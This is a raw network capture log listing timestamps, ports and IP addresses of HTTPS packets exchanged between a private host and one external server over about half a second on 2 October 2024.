                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.736483097 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.736516953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.736540079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737169027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737230062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737281084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737287045 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737298965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737368107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737514019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737554073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737592936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737600088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737624884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.737668037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.742307901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.742350101 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.742414951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.742422104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.742433071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.742537975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.824824095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.824866056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.824925900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.824944019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.824955940 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.824991941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825345039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825367928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825401068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825411081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825438976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825462103 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825978994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.825999975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826050997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826057911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826087952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826107025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826426029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826448917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826524973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826525927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826534986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.826595068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827075958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827100992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827135086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827142000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827167988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827198982 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827543974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827569008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827636003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827636003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827645063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.827693939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.828345060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.828366995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.828419924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.828425884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.828458071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.828499079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.832809925 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.832835913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.832928896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.832928896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.832937956 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.832983971 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916403055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916451931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916490078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916506052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916536093 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916548967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916867971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916920900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916965961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.916974068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.917006016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.917006016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.917567968 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.917634010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.917679071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.917751074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918135881 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918176889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918232918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918232918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918241024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918292046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918642044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918730021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918762922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.918838978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919428110 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919471025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919502974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919509888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919536114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919644117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919786930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919874907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919924974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919924974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919933081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.919995070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.923635006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.923685074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.923727989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.923734903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.923758030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:41.923774958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007286072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007337093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007395029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007426023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007437944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007503986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007683992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007762909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007795095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007802010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.007837057 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.008430004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.008474112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.008496046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.008498907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.008543015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.008586884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.008600950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009011984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009088039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009088039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009116888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009160042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009160042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009361029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009403944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009480000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009480000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009488106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.009546041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010076046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010134935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010184050 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010191917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010200977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010283947 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010565042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010606050 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010651112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010657072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010680914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.010751009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.014453888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.014501095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.014555931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.014564991 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.014586926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.014596939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.097796917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.097827911 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.097906113 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.097930908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.097945929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.098278046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.098304033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.098352909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.098361015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.098396063 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.098396063 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.098994970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099015951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099072933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099072933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099081039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099227905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099545956 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099566936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099622965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099632025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.099644899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100008011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100033045 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100075960 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100083113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100100994 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100202084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100528955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100553036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100611925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100611925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.100619078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.101102114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.101133108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.101162910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.101178885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.101214886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.101214886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.104732037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.104756117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.104813099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.104813099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.104825974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.104974031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.112495899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188491106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188535929 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188569069 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188595057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188623905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188632965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188754082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188841105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188853979 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188879013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188913107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.188922882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190059900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190125942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190145016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190164089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190179110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190197945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190568924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190634966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190635920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190661907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190711975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.190711975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191014051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191063881 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191081047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191104889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191143036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191196918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191699028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191745043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191764116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191780090 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191819906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.191819906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.192328930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.192368031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.192394972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.192409992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.192442894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.192444086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.195421934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.195462942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.195518970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.195518970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.195543051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.195666075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.236399889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279124022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279169083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279205084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279222012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279261112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279261112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:42.279663086 CEST44349713167.114.14.168192.168.2.7
